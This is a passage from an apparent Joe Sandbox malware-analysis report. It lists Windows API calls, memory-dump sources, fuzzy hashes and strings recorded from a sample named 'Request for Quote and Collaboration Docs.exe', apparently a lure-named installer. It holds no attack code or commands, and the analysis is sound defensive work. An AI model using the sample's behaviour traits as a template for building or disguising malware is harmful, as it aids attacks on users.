                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1912718029-0
                                                                                          • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                          • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                          • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                          • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                          • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                          • String ID:
                                                                                          • API String ID: 1148316912-0
                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 1849352358-0
                                                                                          • Opcode ID: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                          • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                          • Opcode Fuzzy Hash: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                          • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                          APIs
                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                          • String ID:
                                                                                          • API String ID: 3808545654-0
                                                                                          • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                          • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                          • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                          • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                          • wsprintfW.USER32 ref: 00404A12
                                                                                          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                          • String ID: %u.%u%s%s
                                                                                          • API String ID: 3540041739-3551169577
                                                                                          • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                          • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                          • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                          • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Timeout
                                                                                          • String ID: !
                                                                                          • API String ID: 1777923405-2657877971
                                                                                          • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                          • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                          • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                          • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
                                                                                          • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: Call
                                                                                          • API String ID: 3677997916-1824292864
                                                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                          • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                          • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 0040593B
                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00405945
                                                                                          • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                          Strings
                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                          • API String ID: 2659869361-297319885
                                                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                          • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                          • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                          APIs
                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1404258612-0
                                                                                          • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                          • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                          • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                          • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                          APIs
                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                          • lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                          • wsprintfW.USER32 ref: 1000160A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocGloballstrcpywsprintf
                                                                                          • String ID: s<u
                                                                                          • API String ID: 2689062267-779365171
                                                                                          • Opcode ID: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                          • Instruction ID: 1bcf6e6733af89869fae1c20b53ab816a204ac51a82716e0e01f59040c2558f4
                                                                                          • Opcode Fuzzy Hash: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                          • Instruction Fuzzy Hash: F8E0D830600821E7F121D7649C44ACD37A8FF412E67164115F706E618DCB228A424689
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,004037F6,76F93420,00403621,?), ref: 00403839
                                                                                          • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                          Strings
                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$GlobalLibrary
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                          • API String ID: 1100898210-297319885
                                                                                          • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                          • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                          • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                          • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,80000000,00000003), ref: 00405987
                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,80000000,00000003), ref: 00405997
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharPrevlstrlen
                                                                                          • String ID: C:\Users\user\Desktop
                                                                                          • API String ID: 2709904686-2743851969
                                                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                          • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                          • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                          APIs
                                                                                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Free$Alloclstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 852173138-0
                                                                                          • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                          • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                          • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                          • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                          APIs
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                          • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                          • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                          • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                          Memory Dump Source
